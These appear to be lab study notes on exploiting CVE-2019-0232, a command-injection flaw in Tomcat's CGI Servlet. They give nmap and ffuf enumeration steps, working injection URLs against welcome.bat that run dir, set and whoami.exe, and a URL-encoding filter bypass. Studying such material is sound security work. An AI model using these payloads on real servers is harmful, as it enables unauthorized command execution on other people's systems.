# 17. Attacking Tomcat CGI

### 1. Vulnerability Overview

#### CVE-2019-0232 - Remote Code Execution (RCE)

* **Description:** Allows remote code execution due to improper input validation in the CGI Servlet when `enableCmdLineArguments` is set to `true`.
* **Affected Versions:**
  * Tomcat **9.0.0.M1 to 9.0.17**
  * Tomcat **8.5.0 to 8.5.39**
  * Tomcat **7.0.0 to 7.0.93**
* **Cause:**
  * The CGI Servlet fails to properly sanitize user-supplied input from the query string, leading to command injection.

***

### 2. Enumeration

#### Nmap Scan

Identify open ports and running services, particularly Apache Tomcat.

```bash
nmap -p- -sC -Pn 10.129.204.227 --open
```

#### CGI Script Discovery (ffuf)

Discover CGI scripts using directory fuzzing.

```bash
ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat
```

This command fuzzes for CGI scripts with the `.bat` extension and may reveal `welcome.bat`.

***

### 3. Exploitation

#### Basic Command Injection

Execute the `dir` command to list files.

```http
http://10.129.204.227:8080/cgi/welcome.bat?&dir
```

#### Retrieve Environment Variables

Check for useful system environment variables.

```http
http://10.129.204.227:8080/cgi/welcome.bat?&set
```

This can reveal critical information, such as the `PATH` variable being unset.

#### Hardcoded Path Execution (whoami)

Attempt to execute `whoami.exe` by specifying its full path.

```http
http://10.129.204.227:8080/cgi/welcome.bat?&c:\windows\system32\whoami.exe
```

This may fail if special characters are filtered.

#### URL Encoding Bypass

Bypass character filtering using URL encoding.

```http
http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe
```

This allows execution of `whoami.exe` despite input restrictions.

***

### 4. Key Considerations

* The `enableCmdLineArguments` setting **must be enabled** for this exploit to work.
* The `&` character is used to separate commands in the injection.
* If the `PATH` environment variable is unset, commands must be executed with their **full path**.
* URL encoding can help bypass character filtering.
* **Only test on systems you have explicit permission to assess.**
* **Replace IP addresses, ports, and URLs with your specific target information.**

***

### 5. Commands Summary

```bash
# Nmap Scan - Identify open ports
nmap -p- -sC -Pn 10.129.204.227 --open

# ffuf - Discover CGI scripts
ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat

# Basic command injection (dir)
http://10.129.204.227:8080/cgi/welcome.bat?&dir

# Retrieve environment variables
http://10.129.204.227:8080/cgi/welcome.bat?&set

# Execute whoami using hardcoded path
http://10.129.204.227:8080/cgi/welcome.bat?&c:\windows\system32\whoami.exe

# URL encoded path execution
http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe
```